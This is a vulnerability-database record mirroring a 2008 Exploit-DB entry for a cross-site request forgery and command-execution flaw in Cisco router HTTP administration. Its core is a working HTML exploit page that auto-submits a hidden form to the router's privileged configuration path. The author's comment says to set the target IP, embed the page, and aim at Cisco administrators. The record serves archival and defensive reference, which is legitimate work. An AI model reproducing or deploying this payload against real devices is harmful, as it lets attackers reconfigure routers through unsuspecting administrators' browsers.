ID
VAR-E-200809-0194
EDB ID
6477
TITLE
Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2) - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2).. remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | cisco | model: | router | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]
Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2
Replace "10.10.10.1" with the IP address of the target router, embed this in a web
page and hope for the best. Cisco Admin's + Safari are the best targets ;) -->
<html>
<body>
<body onload="fdsa.submit();">
<form name=fdsa method="post" action="http://10.10.10.1/level/15/exec/-/configure/http">
<input type=hidden name=command value="alias exec xx xx">
<input type=hidden name=command_url value="/level/15/exec/-">
<input type=hidden name=new_command_url value="/level/15/configure/-">
</body>
</html>
# milw0rm.com [2008-09-17]
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
HTTP Administration Cross-Site Request Forgery / Command Execution (2)
Trust: 1.0
CREDITS
Jeremy Brown
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 6477 | Trust: 1.6 |
db: | EDBNET | id: | 30708 | Trust: 0.6 |
REFERENCES
url: | https://www.exploit-db.com/exploits/6477/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 6477 |
db: | EDBNET | id: | 30708 |
LAST UPDATE DATE
2022-07-27T09:28:31.239000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 6477 | date: | 2008-09-17T00:00:00 |
db: | EDBNET | id: | 30708 | date: | 2008-09-17T00:00:00 |